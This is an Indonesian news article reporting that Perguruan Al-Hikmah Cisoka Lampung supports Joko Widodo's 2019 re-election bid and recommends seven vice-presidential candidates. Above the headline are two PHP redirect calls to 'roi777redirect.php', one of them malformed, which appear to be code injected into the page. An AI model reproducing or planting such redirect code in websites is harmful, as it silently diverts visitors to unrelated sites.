header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Perguruan Al-Hikmah Cisoka Lampung, Dukung Jokowi Presiden Dua Periode -
Perguruan Al-Hikmah Cisoka Lampung, Dukung Jokowi Presiden Dua Periode

Rekomendasikan 7 Nama Cawapres

TRANSLAMPUNG.COM, BANDARLAMPUNG – Keberhasilan pembangunan Presiden RI, Joko Widodo dalam memajukan Negara Kesatuan Republik Indonesia (NKRI) menjadi sorotan semua element masyarakat. Termasuk Perguruan Al Hikmah Cisoka, Lampung.

Perguruan Al-Hikmah Cisoka Lampung juga menyatakan dukungan terhadap pencalonan kedua kalinya, Joko Widodo dalam pelaksanaan Pemilihan Presiden (Pilpres) tahun 2019 mendatang.

Ketua Dewan Guru Al – Hikmah Cisoka Lampung, Abah Wantar mengatakan, pihaknya mendukung sepenuhnya pencalonan Jokowi menjadi Presiden RI untuk yanh kedua kalinya.

Hal ini merujuk, banyaknya pembangunan fisik dan non fisik, yang telah di lakukan pada masa pemerintahan Jokowi. “Bukan hanya itu, Jokowi juga melakukan pembangunan secara merata pada wilayah Indonesia,” ujar dia, saat ditemui di Wisma Haji, Rajabasa Bandarlampung.

Abah Wantar juga, meminta kepada Jokowi untuk memilih salah satu dari 7 calon yang dinilai sangat cocok mendampingi dirinya dalam Pilres nanti.

Ketujuh calon tersebut diantaranya, KH Said Aqil Siradj, As’ad Said Ali, Muhaimin Iskandar, Jendral Moeldoko, Jendral Tito Karnavia, Romahurmuziy dan Airlangga Hartartom. (jef)

News Reporter